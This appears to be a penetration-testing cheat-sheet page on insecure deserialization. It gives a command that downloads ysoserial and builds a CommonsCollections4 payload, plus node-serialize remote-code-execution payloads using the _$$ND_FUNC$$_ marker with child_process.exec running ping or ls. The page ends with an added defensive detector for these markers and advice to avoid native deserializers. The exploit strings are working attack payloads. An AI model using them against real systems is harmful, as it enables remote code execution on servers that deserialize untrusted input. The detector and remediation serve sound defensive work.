Deserialization

Last updated 2 years ago

01. ysoserial

  • Every serialized Java object starts with the hex bytes ac ed.

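# Download the ysoserial build published on JitPack
curl -o ysoserial.jar https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

## ------------------| Apache Tomcat 9.0.27
# Build a CommonsCollections4 payload that runs a single ping, base64-encode it and copy it to the clipboard
java -jar ysoserial.jar CommonsCollections4 "ping -c 1 10.10.14.25" | base64 -w 0 | xclip -selection clipboard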

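02. Node-serialize

// node-serialize treats a value that starts with _$$ND_FUNC$$_ as function source and evaluates it;
// the trailing () makes that function run as soon as unserialize() is called.
var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);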

Payload value with single-quote escaping, then with double-quote escaping:

_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ping -c 1 10.10.14.22\', function(error, stdout, stderr) { console.log(stdout) });}()
_$$ND_FUNC$$_function (){require(\"child_process\").exec(\"ping -c 1 10.10.14.22\", function(error, stdout, stderr) { console.log(stdout) });}()
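
A defensive check built on the two markers above, added here as an example and not part of the original page: it flags input that is or base64-decodes to a Java serialized stream (ac ed), or that carries a node-serialize _$$ND_FUNC$$_ value, either directly or inside base64-encoded JSON. The function names and finding labels are assumptions made for the illustration.

```javascript
// Added example: flag untrusted input that carries either payload type from this page.
const JAVA_MAGIC = Buffer.from([0xac, 0xed]);   // Java stream magic noted on the page
const ND_FUNC = '_$$ND_FUNC$$_';                // node-serialize function marker
const INVOKED = /\}\s*\(\s*\)\s*;?\s*$/;        // function body followed by "()"

// Decode as base64 (standard or URL-safe) only when the text is plausibly base64.
function tryBase64(s) {
  const t = s.trim().replace(/-/g, '+').replace(/_/g, '/');
  if (t.length < 4 || !/^[A-Za-z0-9+/]+={0,2}$/.test(t)) return null;
  return Buffer.from(t, 'base64');
}

// Collect every string leaf of a parsed JSON value together with its path.
function stringLeaves(value, path = '$', out = []) {
  if (typeof value === 'string') out.push({ path, value });
  else if (value && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) stringLeaves(v, `${path}.${k}`, out);
  }
  return out;
}

// The marker prefixes function source; a trailing "()" makes it run during unserialize().
function nodeFindings(text) {
  let leaves;
  try {
    leaves = stringLeaves(JSON.parse(text));
  } catch {
    leaves = [{ path: '$', value: text }];      // not JSON: scan the raw text
  }
  return leaves
    .filter(({ value }) => value.includes(ND_FUNC))
    .map(({ path, value }) =>
      'node-serialize-function' + (INVOKED.test(value) ? '-invoked' : '') + ':' + path);
}

// Inspect one untrusted string (cookie, header or body field) and return the findings.
function inspect(input) {
  const findings = [];
  const decoded = tryBase64(input);
  const isJava = (buf) => buf.length >= 2 && buf.subarray(0, 2).equals(JAVA_MAGIC);
  if (isJava(Buffer.from(input, 'latin1'))) findings.push('java-serialized:raw');
  if (decoded && isJava(decoded)) findings.push('java-serialized:base64');
  findings.push(...nodeFindings(input));
  if (decoded) findings.push(...nodeFindings(decoded.toString('utf8')).map((f) => f + ':base64'));
  return findings;
}
```

An empty result only means neither marker was seen; the durable fix is to stop passing untrusted data to a native deserializer and parse it with JSON.parse or a schema-validated format instead.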